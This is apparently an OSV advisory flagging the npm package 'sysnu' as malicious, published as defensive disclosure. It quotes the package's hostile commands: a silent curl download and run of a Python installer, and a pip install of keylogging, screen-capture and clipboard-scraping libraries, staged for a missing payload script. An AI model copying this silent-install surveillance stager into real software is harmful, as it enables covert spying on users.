MAL-2026-5617

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sysnu/MAL-2026-5617.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5617
Published
2026-06-11T06:49:33Z
Modified
2026-06-11T08:01:32.824773548Z
Summary
Malicious code in sysnu (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (eac9873e59ffdf79c56fd4f9366b56e0532f87dc00c4380fae18d714785b0bc8)

On require() / CLI invocation, sysnu performs two install-time-equivalent actions on Windows hosts. First, if python is not on PATH, index.js (lines 42-46) runs curl -s -L -o <tmp>\python-3.12.3-amd64.exe https://www.python.org/ftp/python/3.12.3/python-3.12.3-amd64.exe and then executes the installer with /quiet InstallAllUsers=0 PrependPath=1, deleting the installer afterwards. Code comments explicitly describe this as a 'GHOST INSTALLER' with 'No UI, No Admin Popup' — i.e., the runtime is provisioned and PATH is mutated with no user consent. Second, index.js line 73 unconditionally runs pip install pyperclip keyboard requests pillow mss pyautogui pywin32 uiautomation comtypes --quiet — a Windows surveillance stack covering keylogging (keyboard), screen capture (mss/pillow), input automation (pyautogui), clipboard scraping (pyperclip), and UI automation (uiautomation/comtypes/pywin32). Index.js line 81 then spawns python pointer.py, but pointer.py is NOT present in the tarball, so the package is a stager awaiting an out-of-band payload that will execute with the freshly-installed surveillance primitives available. The package's advertised purpose ('System binary configuration tool') has no relationship to clipboard/keyboard/screen capture. Metadata is placeholder-grade (author 'ABC', no repository/homepage, generic description), consistent with a throwaway dropper account.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005656",
            "versions": [
                "1.0.1"
            ],
            "sha256": "6ce3c0fee91f5a835d43c1c136e3535f4ce0bff6c519d59166e95cf7f7cefa3a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T06:49:36Z",
            "import_time": "2026-06-11T07:49:37.670970859Z"
        },
        {
            "id": "IN-MAL-2026-005652",
            "versions": [
                "1.0.0"
            ],
            "sha256": "eac9873e59ffdf79c56fd4f9366b56e0532f87dc00c4380fae18d714785b0bc8",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T06:49:33Z",
            "import_time": "2026-06-11T07:49:37.266355882Z"
        }
    ]
}

Affected packages

Package: npm / sysnu
Affected ranges: 1.*
Affected versions: 1.0.0, 1.0.1

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sysnu/MAL-2026-5617.json"
indicators
{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "dd63a58755fb0ff2919a9debd8e6adb710a9f755454c10e766920dec788c4c33",
            "tlsh": "69814f065a95a234ed7247a99b07212be517a063a100e69cbdbe83840f76945c073fee"
        },
        {
            "path": "pointer.py",
            "sha256": "8674a966c2b0c3ec348331dd0273de15cbe236eb8b10a1afbcd63e1dd7f11ea7",
            "tlsh": "b2e2ea09ec0d0896c473de2e9952b817fb1a0b435a1e9e17f8bc99905f7430789e4ef9"
        },
        {
            "path": "package.json",
            "sha256": "3a4d9dd11c7d4b5c9c7982bb68457c0dff5353faf7972e109be6aa464617a017",
            "tlsh": "44e04f3789615d9344b44aa29a769a19b1b28b3f10294c0f31bb905c97b25a245bab2c"
        }
    ],
    "package_integrity": [
        {
            "filename": "sysnu-1.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-bw0yvTTcwyKVAQwYfceEbDsTNPcA15TRiKQ0s1s7WLqw6KnoukrNvT6+DxsFftRIQUT8D8dFo23mIrVqMWnNiA==",
                "sha1": "72d44e77e44dc27999e3ac3326628cb91a8ef837"
            }
        }
    ]
}